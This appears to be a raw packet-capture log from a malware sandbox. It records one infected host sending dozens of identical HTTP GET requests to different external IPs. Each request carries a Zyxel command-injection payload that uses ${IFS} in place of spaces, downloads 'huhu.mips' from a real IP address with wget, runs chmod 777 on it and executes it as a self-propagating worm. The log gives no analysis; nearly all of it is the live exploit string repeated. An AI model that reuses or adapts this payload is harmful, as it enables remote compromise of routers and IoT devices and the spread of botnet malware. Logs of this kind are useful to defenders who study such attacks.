                                            Feb 2, 2024 06:21:24.873039007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7625192.168.2.154109665.82.144.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873078108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7626192.168.2.1535158184.169.63.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873126984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7627192.168.2.1545216183.67.36.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873172045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7628192.168.2.1537470148.227.178.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873213053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7629192.168.2.1555338164.252.144.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873267889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7630192.168.2.1544508120.107.211.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873301983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7631192.168.2.1549744107.209.213.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873328924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7632192.168.2.1548806107.165.159.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873377085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7633192.168.2.1540536158.160.174.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873425961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7634192.168.2.1551484146.213.23.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873478889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7635192.168.2.154056282.161.82.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873502970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7636192.168.2.155910814.189.49.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873533010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7637192.168.2.1550036162.211.41.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873606920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7638192.168.2.153477025.203.2.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873634100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7639192.168.2.1552916175.47.206.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873680115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7640192.168.2.1547412172.11.205.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873706102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7641192.168.2.1553224210.12.48.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873752117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7642192.168.2.1543874163.227.154.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873773098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7643192.168.2.1541862189.102.14.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873831034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7644192.168.2.1553378194.246.72.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873858929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7645192.168.2.154488218.0.42.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873894930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7646192.168.2.1554140108.178.123.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873925924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7647192.168.2.1546454116.74.244.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.873989105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7648192.168.2.1539336166.133.28.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874033928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7649192.168.2.1546672189.135.69.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874047995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7650192.168.2.155090098.20.121.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874093056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7651192.168.2.1541354141.190.110.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874150991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7652192.168.2.15368424.223.140.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874203920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7653192.168.2.1558950218.23.123.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874244928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7654192.168.2.1541514195.211.42.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874267101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7655192.168.2.1558090210.200.240.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874309063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7656192.168.2.156016443.255.26.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874339104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7657192.168.2.153452680.134.11.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874392986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7658192.168.2.1550808115.193.97.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874437094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7659192.168.2.1554268122.238.169.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874469995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7660192.168.2.153608034.13.121.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874516010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7661192.168.2.155548280.15.207.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874567032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7662192.168.2.153627275.57.137.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874599934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7663192.168.2.154411613.56.61.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874646902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7664192.168.2.15389608.225.189.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874684095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7665192.168.2.153635437.105.30.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874720097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7666192.168.2.1533174133.250.129.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874756098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7667192.168.2.1551882136.18.199.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874790907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7668192.168.2.1534724217.125.118.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874828100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7669192.168.2.154345285.20.101.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874871969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7670192.168.2.1550616151.37.149.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874901056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7671192.168.2.153447473.235.16.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874942064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7672192.168.2.1553634150.86.162.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.874982119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7673192.168.2.1533668207.81.121.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875011921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7674192.168.2.153824499.253.159.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875066042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7675192.168.2.154736648.192.215.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875089884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7676192.168.2.1555570179.149.237.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875128984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7677192.168.2.154300690.32.17.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875159979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7678192.168.2.154438260.205.85.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875190020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7679192.168.2.154820867.82.255.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875250101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7680192.168.2.1538746161.110.138.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875284910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7681192.168.2.1550114131.220.82.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875332117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7682192.168.2.153857044.137.75.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875368118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7683192.168.2.1542860164.199.65.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875406027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7684192.168.2.155991099.96.218.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875443935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7685192.168.2.1533512100.135.81.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875493050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7686192.168.2.1550482117.96.87.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875550032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7687192.168.2.154258448.126.222.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875580072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7688192.168.2.154177478.153.133.30443
                                            TimestampBytes transferredDirectionData
